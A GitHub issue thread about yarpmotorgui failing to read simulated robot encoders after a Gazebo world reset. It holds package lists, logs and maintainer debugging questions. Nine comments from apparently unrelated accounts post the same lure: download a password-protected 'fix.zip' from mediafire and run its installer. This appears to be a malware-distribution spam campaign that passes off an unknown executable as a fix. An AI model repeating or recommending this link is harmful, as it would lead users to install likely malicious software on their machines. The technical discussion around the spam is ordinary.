robotology/gazebo-yarp-plugins #685: Cannot read encoders after resetting world

PasMarra, 2024-08-26:
When running Gazebo with the `gazebo_yarp_clock`, if I reset the world (`ctrl+R`) and, then, I try to run the `yarpmotorgui`, this latter fails to read the encoders.
The problem does not happen when not using `gazebo_yarp_clock`.

## How to recreate the error:

<details><summary>conda list -n metaCub</summary>

```
pasquale@IITICB001LW003:~$ conda list -n metaCub
# packages in environment at /home/pasquale/miniforge3/envs/metaCub:
#
# Name                    Version                   Build  Channel
_libgcc_mutex             0.1                 conda_forge    conda-forge
_openmp_mutex             4.5                       2_gnu    conda-forge
ace                       8.0.0                hac33072_1    conda-forge
addict                    2.4.0                    pypi_0    pypi
aiohttp                   3.9.5           py310h2372a71_0    conda-forge
aiosignal                 1.3.1              pyhd8ed1ab_0    conda-forge
alsa-lib                  1.2.12               h4ab18f5_0    conda-forge
ampl-mp                   3.1.0             h2cc385e_1006    conda-forge
aom                       3.8.2                h59595ed_0    conda-forge
assimp                    5.3.1                hfb0e8fe_2    conda-forge
asttokens                 2.4.1              pyhd8ed1ab_0    conda-forge
async-timeout             4.0.3              pyhd8ed1ab_0    conda-forge
atk-1.0                   2.38.0               hd4edc92_1    conda-forge
attr                      2.5.1                h166bdaf_1    conda-forge
attrs                     23.2.0             pyh71513ae_0    conda-forge
aws-c-auth                0.7.17               he0b1f16_2    conda-forge
aws-c-cal                 0.6.11               heb1d5e4_0    conda-forge
aws-c-common              0.9.15               hd590300_0    conda-forge
aws-c-compression         0.2.18               hce8ee76_3    conda-forge
aws-c-event-stream        0.4.2                h01f5eca_8    conda-forge
aws-c-http                0.8.1               hdb68c23_10    conda-forge
aws-c-io                  0.14.7               hbfbeace_6    conda-forge
aws-c-mqtt                0.10.3               h50844eb_4    conda-forge
aws-c-s3                  0.5.7                hb7bd14b_1    conda-forge
aws-c-sdkutils            0.1.15               hce8ee76_3    conda-forge
aws-checksums             0.1.18               hce8ee76_3    conda-forge
aws-crt-cpp               0.26.6               hf567797_4    conda-forge
aws-sdk-cpp               1.11.267             hbf3e495_6    conda-forge
azure-core-cpp            1.11.1               h91d86a7_1    conda-forge
azure-identity-cpp        1.6.0                hf1915f5_1    conda-forge
azure-storage-blobs-cpp   12.10.0              h00ab1b0_1    conda-forge
azure-storage-common-cpp  12.5.0               h94269e2_4    conda-forge
binutils                  2.40                 h4852527_7    conda-forge
binutils_impl_linux-64    2.40                 ha1999f0_7    conda-forge
binutils_linux-64         2.40                 hb3c18ed_0    conda-forge
bipedal-locomotion-framework 0.18.0               ha770c72_6    conda-forge
bipedal-locomotion-framework-python 0.18.0          py310he3eb0c9_6    conda-forge
blinker                   1.8.2                    pypi_0    pypi
blosc                     1.21.5               h0f2a231_0    conda-forge
boost-cpp                 1.82.0               h44aadfe_6    conda-forge
brotli                    1.1.0                hd590300_1    conda-forge
brotli-bin                1.1.0                hd590300_1    conda-forge
bullet-cpp                3.25                 hcc13569_2    conda-forge
bzip2                     1.0.8                h4bc722e_7    conda-forge
c-ares                    1.32.2               h4bc722e_0    conda-forge
c-compiler                1.7.0                hd590300_1    conda-forge
ca-certificates           2024.7.4             hbcca054_0    conda-forge
cached-property           1.5.2                hd8ed1ab_1    conda-forge
cached_property           1.5.2              pyha770c72_1    conda-forge
cairo                     1.18.0               h3faef2a_0    conda-forge
casadi                    3.6.5           py310he84b9c3_4    conda-forge
certifi                   2024.7.4           pyhd8ed1ab_0    conda-forge
cfitsio                   4.3.1                hbdc6101_0    conda-forge
charset-normalizer        3.3.2                    pypi_0    pypi
click                     8.1.7                    pypi_0    pypi
collada-dom               2.5.0                ha438cbf_7    conda-forge
comm                      0.2.2                    pypi_0    pypi
configargparse            1.7                      pypi_0    pypi
[... 481 lines cut ...]
[WARNING] robotDescriptionServer not found, robot parts will be set manually.
[DEBUG] Appending /ergocubSim/head
[DEBUG] Appending /ergocubSim/torso
[DEBUG] Appending /ergocubSim/left_arm
[DEBUG] Appending /ergocubSim/right_arm
[DEBUG] Appending /ergocubSim/left_leg
[DEBUG] Appending /ergocubSim/right_leg
[DEBUG] Checking the existence of: /yarpmotorgui0//ergocubSim/head/rpc:o 
[DEBUG] ADDRESS is:  
[DEBUG] |yarp.dev.PolyDriver|remote_controlboard| Parameters are (carrier udp) (device remote_controlboard) (local "/yarpmotorgui0//ergocubSim/head") (remote "/ergocubSim/head")
[INFO] |yarp.os.Port|/yarpmotorgui0//ergocubSim/head/rpc:o| Port /yarpmotorgui0//ergocubSim/head/rpc:o active at tcp://10.240.78.138:10052/
[INFO] |yarp.os.Port|/yarpmotorgui0//ergocubSim/head/command:o| Port /yarpmotorgui0//ergocubSim/head/command:o active at tcp://10.240.78.138:10053/
[INFO] |yarp.os.Port|/yarpmotorgui0//ergocubSim/head/stateExt:i| Port /yarpmotorgui0//ergocubSim/head/stateExt:i active at tcp://10.240.78.138:10054/
[INFO] |yarp.os.impl.PortCoreOutputUnit|/yarpmotorgui0//ergocubSim/head/rpc:o| Sending output from /yarpmotorgui0//ergocubSim/head/rpc:o to /ergocubSim/head/rpc:i using tcp
[INFO] |yarp.os.impl.PortCoreOutputUnit|/yarpmotorgui0//ergocubSim/head/command:o| Sending output from /yarpmotorgui0//ergocubSim/head/command:o to /ergocubSim/head/command:i using udp
[INFO] |yarp.os.impl.PortCoreInputUnit|/yarpmotorgui0//ergocubSim/head/stateExt:i| Receiving input from /ergocubSim/head/stateExt:o to /yarpmotorgui0//ergocubSim/head/stateExt:i using udp
[INFO] |yarp.dev.PolyDriver|remote_controlboard| Created device <remote_controlboard>. See C++ class RemoteControlBoard for documentation.
[DEBUG] Setting a valid finder 
[INFO] |yarp.os.Port|/yarpmotorgui/head/sequence:o| Port /yarpmotorgui/head/sequence:o active at tcp://10.240.78.138:10055/
[DEBUG] Initializing interfaces...
[DEBUG] Opening interfaces...
[ERROR] head iencs->getEncoders() failed, retrying...
[ERROR] head iencs->getEncoders() failed, retrying...
[ERROR] head iencs->getEncoders() failed, retrying...
```

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

pilot5657, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

abdulhkeemGit, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

luozhengdong, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

traversaro, 2024-09-02:
Thanks for reporting the issue. Which version of YARP are you using?

traversaro, 2024-09-02:
Are you setting the `YARP_CLOCK` when launching `yarpmotorgui` ?

traversaro, 2024-09-02:
If you read the data from the port with `yarp read ... /ergocubSim/head/stateExt:o` is the data published after a Ctrl+R ?

PasMarra, 2024-09-03:
> Thanks for reporting the issue. Which version of YARP are you using?

`yarp 3.9.0` and `libgazebo-yarp-plugins 4.10.0`.

> Are you setting the `YARP_CLOCK` when launching `yarpmotorgui` ?

No, but it does not work even if I do so.

> If you read the data from the port with `yarp read ... /ergocubSim/head/stateExt:o` is the data published after a Ctrl+R ?

No, it stops as soon as I press Ctrl+R. And if I try to read it again, it gets stuck as follows:

```
(metaCub) pasquale@IITICB001LW003:~$ yarp read ... /ergocubSim/head/stateExt:o
[INFO] |yarp.os.Port|/tmp/port/1| Port /tmp/port/1 active at tcp://10.240.78.150:10077/
[INFO] |yarp.os.impl.PortCoreInputUnit|/tmp/port/1| Receiving input from /ergocubSim/head/stateExt:o to /tmp/port/1 using tcp

```

traversaro, 2024-09-03:
Ok, then there is something strange going on in the wrapper. I do not see anything strange in the code that changed recently, does the gazebo terminal output some error or similar?

PasMarra, 2024-09-04:
> If you read the data from the port with `yarp read ... /ergocubSim/head/stateExt:o` is the data published after a Ctrl+R ?

I've just noticed that even if it stops as soon as I press Ctrl+R, if I wait about 3 min it starts streaming data again.

>does the gazebo terminal output some error or similar?

If `export YARP_CLOCK=/clock && gazebo -s libgazebo_yarp_clock.so --verbose`, then this is what I get right after spawning the robot:

```
[INFO] All actions for action level 10 of startup phase started. Waiting for unfinished actions.
[INFO] All actions for action level 10 of startup phase finished.
[INFO] startup phase finished.
[Err] [Plugin.hh:212] Failed to load plugin gz-sim-yarp-robotinterface-system: gz-sim-yarp-robotinterface-system: cannot open shared object file: No such file or directory
[Err] [Plugin.hh:212] Failed to load plugin gz-sim-forcetorque-system: gz-sim-forcetorque-system: cannot open shared object file: No such file or directory
[Err] [Plugin.hh:212] Failed to load plugin gz-sim-imu-system: gz-sim-imu-system: cannot open shared object file: No such file or directory
```
while this is what appears right after `Ctrl+R`:
```
[INFO] |yarp.os.impl.PortCoreOutputUnit|/ergocubSim/head/stateExt:o| Sending output from /ergocubSim/head/stateExt:o to /tmp/port/1 using tcp
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[Wrn] [msgs.cc:1844] Conversion of sensor type[force_torque] not supported.
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| INITIAL CONFIGURATION IS:  -0.520000	 0.520000	 0.000000	 0.785000	 0.000000	 0.000000	 0.000000
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with default values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| INITIAL CONFIGURATION IS:  -0.520000	 0.520000	 0.000000	 0.785000	 0.000000	 0.000000	 0.000000
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with default values
[DEBUG] |gazebo-yarp-plugins.plugins.GazeboYarpControlBoard| Initializing Trajectory Generator with current values
```

traversaro, 2024-09-04:
Ok, thanks. Probably there is some kind of comparison on the current time in the network wrapper server, and if you reset at instance t=100s, it then waits again for t=100s to start again. By the way, I wonder if you tried to do Reset World States (I can't recall the exact name) instead of doing Reset World?

PasMarra, 2024-09-06:
I guess you're referring to `Ctrl+Shift+R` that is [Reset Model Poses](https://classic.gazebosim.org/tutorials?tut=guided_b2&cat=#TheMenu) which

[image]

I've tried this one, but it seems not to have any effect on the model.

traversaro, 2024-09-06:
Unfortunatly I will not be able to look into this in the next week, if you want to debug yourself I suggest to look into https://github.com/robotology/yarp/blob/yarp-3.9/src/devices/controlBoard_nws_yarp/ControlBoard_nws_yarp.cpp#L454-L552 and understand at which point the code blocks when there is a Gazebo reset.